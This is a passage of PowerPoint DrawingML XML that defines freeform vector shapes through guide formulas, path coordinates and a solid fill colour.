                  <a:gd name="T52" fmla="*/ 0 w 491"/>
                  <a:gd name="T53" fmla="*/ 0 h 151"/>
                  <a:gd name="T54" fmla="*/ 0 w 491"/>
                  <a:gd name="T55" fmla="*/ 0 h 151"/>
                  <a:gd name="T56" fmla="*/ 0 w 491"/>
                  <a:gd name="T57" fmla="*/ 0 h 151"/>
                  <a:gd name="T58" fmla="*/ 0 w 491"/>
                  <a:gd name="T59" fmla="*/ 0 h 151"/>
                  <a:gd name="T60" fmla="*/ 0 w 491"/>
                  <a:gd name="T61" fmla="*/ 0 h 151"/>
                  <a:gd name="T62" fmla="*/ 0 w 491"/>
                  <a:gd name="T63" fmla="*/ 0 h 151"/>
                  <a:gd name="T64" fmla="*/ 0 w 491"/>
                  <a:gd name="T65" fmla="*/ 0 h 151"/>
                  <a:gd name="T66" fmla="*/ 0 w 491"/>
                  <a:gd name="T67" fmla="*/ 0 h 151"/>
                  <a:gd name="T68" fmla="*/ 0 w 491"/>
                  <a:gd name="T69" fmla="*/ 0 h 151"/>
                  <a:gd name="T70" fmla="*/ 0 w 491"/>
                  <a:gd name="T71" fmla="*/ 0 h 151"/>
                  <a:gd name="T72" fmla="*/ 0 w 491"/>
                  <a:gd name="T73" fmla="*/ 0 h 151"/>
                  <a:gd name="T74" fmla="*/ 0 w 491"/>
                  <a:gd name="T75" fmla="*/ 0 h 151"/>
                  <a:gd name="T76" fmla="*/ 0 w 491"/>
                  <a:gd name="T77" fmla="*/ 0 h 151"/>
                  <a:gd name="T78" fmla="*/ 0 w 491"/>
                  <a:gd name="T79" fmla="*/ 0 h 151"/>
                  <a:gd name="T80" fmla="*/ 0 w 491"/>
                  <a:gd name="T81" fmla="*/ 0 h 151"/>
                  <a:gd name="T82" fmla="*/ 0 w 491"/>
                  <a:gd name="T83" fmla="*/ 0 h 151"/>
                  <a:gd name="T84" fmla="*/ 0 w 491"/>
                  <a:gd name="T85" fmla="*/ 0 h 151"/>
                  <a:gd name="T86" fmla="*/ 0 w 491"/>
                  <a:gd name="T87" fmla="*/ 0 h 151"/>
                  <a:gd name="T88" fmla="*/ 0 w 491"/>
                  <a:gd name="T89" fmla="*/ 0 h 151"/>
                  <a:gd name="T90" fmla="*/ 0 w 491"/>
                  <a:gd name="T91" fmla="*/ 0 h 151"/>
                  <a:gd name="T92" fmla="*/ 0 w 491"/>
                  <a:gd name="T93" fmla="*/ 0 h 151"/>
                  <a:gd name="T94" fmla="*/ 0 w 491"/>
                  <a:gd name="T95" fmla="*/ 0 h 151"/>
                  <a:gd name="T96" fmla="*/ 0 w 491"/>
                  <a:gd name="T97" fmla="*/ 0 h 151"/>
                  <a:gd name="T98" fmla="*/ 0 w 491"/>
                  <a:gd name="T99" fmla="*/ 0 h 151"/>
                  <a:gd name="T100" fmla="*/ 0 w 491"/>
                  <a:gd name="T101" fmla="*/ 0 h 151"/>
                  <a:gd name="T102" fmla="*/ 0 w 491"/>
                  <a:gd name="T103" fmla="*/ 0 h 151"/>
                  <a:gd name="T104" fmla="*/ 0 w 491"/>
                  <a:gd name="T105" fmla="*/ 0 h 151"/>
                  <a:gd name="T106" fmla="*/ 0 w 491"/>
                  <a:gd name="T107" fmla="*/ 0 h 151"/>
                  <a:gd name="T108" fmla="*/ 0 w 491"/>
                  <a:gd name="T109" fmla="*/ 0 h 15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1"/>
                  <a:gd name="T166" fmla="*/ 0 h 151"/>
                  <a:gd name="T167" fmla="*/ 491 w 491"/>
                  <a:gd name="T168" fmla="*/ 151 h 15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1" h="151">
                    <a:moveTo>
                      <a:pt x="158" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="164" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CC0A2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4118" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="418" y="2417"/>
                <a:ext cx="61" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 189"/>
                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 189"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 189"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 189"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 189"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 189"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 189"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 189"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0 w 189"/>
                  <a:gd name="T17" fmla="*/ 0 h 125"/>
                  <a:gd name="T18" fmla="*/ 0 w 189"/>
                  <a:gd name="T19" fmla="*/ 0 h 125"/>
                  <a:gd name="T20" fmla="*/ 0 w 189"/>
                  <a:gd name="T21" fmla="*/ 0 h 125"/>
                  <a:gd name="T22" fmla="*/ 0 w 189"/>
                  <a:gd name="T23" fmla="*/ 0 h 125"/>
                  <a:gd name="T24" fmla="*/ 0 w 189"/>
                  <a:gd name="T25" fmla="*/ 0 h 125"/>
                  <a:gd name="T26" fmla="*/ 0 w 189"/>
                  <a:gd name="T27" fmla="*/ 0 h 125"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 0 h 125"/>
                  <a:gd name="T30" fmla="*/ 0 w 189"/>
                  <a:gd name="T31" fmla="*/ 0 h 125"/>
                  <a:gd name="T32" fmla="*/ 0 w 189"/>
                  <a:gd name="T33" fmla="*/ 0 h 125"/>
                  <a:gd name="T34" fmla="*/ 0 w 189"/>
                  <a:gd name="T35" fmla="*/ 0 h 125"/>
                  <a:gd name="T36" fmla="*/ 0 w 189"/>
                  <a:gd name="T37" fmla="*/ 0 h 125"/>
                  <a:gd name="T38" fmla="*/ 0 w 189"/>
                  <a:gd name="T39" fmla="*/ 0 h 125"/>
                  <a:gd name="T40" fmla="*/ 0 w 189"/>
                  <a:gd name="T41" fmla="*/ 0 h 125"/>
                  <a:gd name="T42" fmla="*/ 0 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 125"/>
                  <a:gd name="T44" fmla="*/ 0 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 125"/>
                  <a:gd name="T46" fmla="*/ 0 w 189"/>
                  <a:gd name="T47" fmla="*/ 0 h 125"/>
                  <a:gd name="T48" fmla="*/ 0 w 189"/>
                  <a:gd name="T49" fmla="*/ 0 h 125"/>
                  <a:gd name="T50" fmla="*/ 0 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 125"/>
                  <a:gd name="T52" fmla="*/ 0 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 125"/>
                  <a:gd name="T54" fmla="*/ 0 w 189"/>
                  <a:gd name="T55" fmla="*/ 0 h 125"/>
                  <a:gd name="T56" fmla="*/ 0 w 189"/>
                  <a:gd name="T57" fmla="*/ 0 h 125"/>
                  <a:gd name="T58" fmla="*/ 0 w 189"/>
                  <a:gd name="T59" fmla="*/ 0 h 125"/>
                  <a:gd name="T60" fmla="*/ 0 w 189"/>
                  <a:gd name="T61" fmla="*/ 0 h 125"/>
                  <a:gd name="T62" fmla="*/ 0 w 189"/>
                  <a:gd name="T63" fmla="*/ 0 h 125"/>
                  <a:gd name="T64" fmla="*/ 0 w 189"/>
                  <a:gd name="T65" fmla="*/ 0 h 125"/>
                  <a:gd name="T66" fmla="*/ 0 w 189"/>
                  <a:gd name="T67" fmla="*/ 0 h 125"/>
                  <a:gd name="T68" fmla="*/ 0 w 189"/>
                  <a:gd name="T69" fmla="*/ 0 h 125"/>
                  <a:gd name="T70" fmla="*/ 0 w 189"/>
                  <a:gd name="T71" fmla="*/ 0 h 125"/>
                  <a:gd name="T72" fmla="*/ 0 w 189"/>
                  <a:gd name="T73" fmla="*/ 0 h 125"/>
                  <a:gd name="T74" fmla="*/ 0 w 189"/>
                  <a:gd name="T75" fmla="*/ 0 h 125"/>
                  <a:gd name="T76" fmla="*/ 0 w 189"/>
                  <a:gd name="T77" fmla="*/ 0 h 125"/>
                  <a:gd name="T78" fmla="*/ 0 w 189"/>
                  <a:gd name="T79" fmla="*/ 0 h 125"/>
                  <a:gd name="T80" fmla="*/ 0 w 189"/>
                  <a:gd name="T81" fmla="*/ 0 h 125"/>
                  <a:gd name="T82" fmla="*/ 0 w 189"/>
                  <a:gd name="T83" fmla="*/ 0 h 125"/>
                  <a:gd name="T84" fmla="*/ 0 w 189"/>
                  <a:gd name="T85" fmla="*/ 0 h 125"/>
                  <a:gd name="T86" fmla="*/ 0 w 189"/>
                  <a:gd name="T87" fmla="*/ 0 h 125"/>
                  <a:gd name="T88" fmla="*/ 0 w 189"/>
                  <a:gd name="T89" fmla="*/ 0 h 125"/>
                  <a:gd name="T90" fmla="*/ 0 w 189"/>
                  <a:gd name="T91" fmla="*/ 0 h 125"/>
                  <a:gd name="T92" fmla="*/ 0 w 189"/>
                  <a:gd name="T93" fmla="*/ 0 h 125"/>
                  <a:gd name="T94" fmla="*/ 0 w 189"/>
                  <a:gd name="T95" fmla="*/ 0 h 125"/>
                  <a:gd name="T96" fmla="*/ 0 w 189"/>
                  <a:gd name="T97" fmla="*/ 0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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 125"/>
                  <a:gd name="T149" fmla="*/ 189 w 189"/>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9" h="125">
                    <a:moveTo>
                      <a:pt x="189" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
